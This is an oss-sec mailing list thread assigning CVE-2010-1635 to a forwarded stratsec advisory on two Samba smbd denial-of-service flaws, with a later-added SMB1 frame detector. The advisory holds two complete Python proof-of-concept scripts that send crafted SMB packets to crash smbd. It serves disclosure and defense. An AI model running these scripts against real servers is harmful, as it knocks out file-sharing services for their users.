oss-sec mailing list archives

Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities


From: Josh Bressers <bressers () redhat com>
Date: Tue, 25 May 2010 13:53:46 -0400 (EDT)

Please use CVE-2010-1635

Sorry for the delay, I've been out for a few days.

-- 
    JB


----- "Thomas Biege" <thomas () novell com> wrote:

So far no assignments were made, right?

On Thursday 20 May 2010 16:17:48, Thomas Biege wrote:
Hello oss-security,
was a CVE-ID assigned for this issue already?

Thanks,
Thomas


----------  Forwarded Message  ----------

Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities
Date: Wednesday 12 May 2010, 09:00:07
From: stratsec Advisories <advisories () stratsec net>
To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>


===============================================================================
stratsec Security Advisory: SS-2010-005
===============================================================================

Title:           Samba Multiple DoS Vulnerabilities
Version:         1.0
Issue type:      Multiple
Affected vendor: Samba
Release date:    12/05/2010
Discovered by:   Laurent Gaffié
Issue status:    Patch available


===============================================================================

Summary
-------

Two vulnerabilities were discovered within the Samba Smbd daemon which allow
an attacker to trigger a null pointer dereference or an uninitialized
variable read by sending a specific 'Session Setup AndX' query.
Successful exploitation of these issues will result in a denial of service.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common Internet File
System (CIFS) acts as an application-layer protocol to provide shared access
to files, printers and Inter-Process Communication (IPC). It is also a
transport for Distributed Computing Environment / Remote Procedure Call
(DCE / RPC) operations. After negotiating an SMB communication the client
sends a 'Session Setup AndX' packet to negotiate a session in order to be
able to connect on a specific share.

To trigger the null pointer dereference, the client needs to send a crafted
SMB 'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003'
(no Unicode), followed by a Session Setup AndX request with the SMB header
'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash
within the Smbd process.

The uninitialised Variable Read issue can be triggered if the client sends
a crafted 'Session Setup AndX' with a 'security blob length' value set to
'\xff\xff'.

Impact
------

A remote attacker can cause a denial of service within the Samba daemon.

Affected products
-----------------

Samba <=3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the uninitialised variable read issue, the following Python
proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
 sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))


To trigger the null pointer dereference issue this Python proof of
concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
 sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

Solution
--------

Update to version 3.5.2 or 3.4.8 (http://samba.org/)

Response timeline
-----------------

* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after
               receiving the initial email
* 09/03/2010 - Vendor confirms issue presence, and provides a patch 3
               hours after receiving the initial email.
* 09/03/2010 - stratsec confirms patch resolves issue.
* 15/03/2010 - Uninitialised Variable Read issue reported to vendor.
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours
               after receiving the initial email.
* 15/03/2010 - stratsec confirms patch resolves issue
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.
* 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.
* 12/05/2010 - This advisory published.

References
----------
* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thank the Samba Security Team for their
  responsiveness while handling these issues


===============================================================================

About stratsec
--------------
stratsec specialises in providing information security consulting and
testing services for government and commercial clients. Established in
2004, we are now one of the leading independent information security
companies in the Australasian and SE-Asian region, with offices throughout
Australia and in Singapore and Malaysia.

For more information, please visit our website at
http://www.stratsec.net/


===============================================================================

-- 
 Thomas Biege <thomas () novell com>, SUSE LINUX, Security Support & Auditing
 SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
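
Added example, not part of the original thread or of the stratsec advisory: a small SMB1 frame inspector that flags the two conditions the advisory describes (a Negotiate without the Unicode bit in Flags2 followed by a Session Setup AndX with it, and a security blob length larger than the data actually carried). The helper names and the test frames are constructed for illustration; the Flags2 check is a heuristic and needs baselining against the clients in a given environment.

```python
import struct

SMB_MAGIC = b"\xffSMB"
CMD_NEGOTIATE, CMD_SESSION_SETUP = 0x72, 0x73
FLAGS2_UNICODE = 0x8000

def parse_smb1(frame):
    """Split one NetBIOS-framed SMB1 message into (command, flags2, words, data)."""
    msg = frame[4:]                       # skip the 4-byte NetBIOS session header
    if len(msg) < 35 or msg[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    cmd, flags2 = msg[4], struct.unpack_from("<H", msg, 10)[0]
    bc_off = 33 + 2 * msg[32]             # WordCount is at offset 32 of the message
    if len(msg) < bc_off + 2:
        raise ValueError("truncated parameter block")
    byte_count = struct.unpack_from("<H", msg, bc_off)[0]
    return cmd, flags2, msg[33:bc_off], msg[bc_off + 2:bc_off + 2 + byte_count]

def inspect_session(frames):
    """Return findings for the client-to-server frames of one TCP connection."""
    findings, nego_flags2 = [], None
    for frame in frames:
        cmd, flags2, words, data = parse_smb1(frame)
        if cmd == CMD_NEGOTIATE:
            nego_flags2 = flags2
        elif cmd == CMD_SESSION_SETUP:
            # Sequence from the advisory: negotiate without Unicode, then Unicode.
            if (nego_flags2 is not None and not nego_flags2 & FLAGS2_UNICODE
                    and flags2 & FLAGS2_UNICODE):
                findings.append("flags2-unicode-switch")
            # WordCount 12 form: SecurityBlobLength is the u16 at byte offset 14.
            if len(words) == 24:
                blob_len = struct.unpack_from("<H", words, 14)[0]
                if blob_len > len(data):
                    findings.append("security-blob-length-exceeds-data")
    return findings

def build_frame(cmd, flags2, words=b"", data=b""):
    """Constructed test frame (hypothetical helper), not a captured packet."""
    hdr = SMB_MAGIC + struct.pack("<BIBH", cmd, 0, 0x18, flags2) + b"\x00" * 20
    body = hdr + bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data
    return struct.pack(">I", len(body)) + body

def setup_words(blob_len):
    """Constructed 12-word Session Setup AndX parameter block."""
    return struct.pack("<BBHHHHIHII", 0xFF, 0, 0, 4356, 50, 0, 0, blob_len, 0, 0)

if __name__ == "__main__":
    nego = build_frame(CMD_NEGOTIATE, 0x0003, data=b"\x02NT LM 0.12\x00")
    setup = build_frame(CMD_SESSION_SETUP, 0x8003, setup_words(0xFFFF), b"\x00" * 16)
    print(inspect_session([nego, setup]))
```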

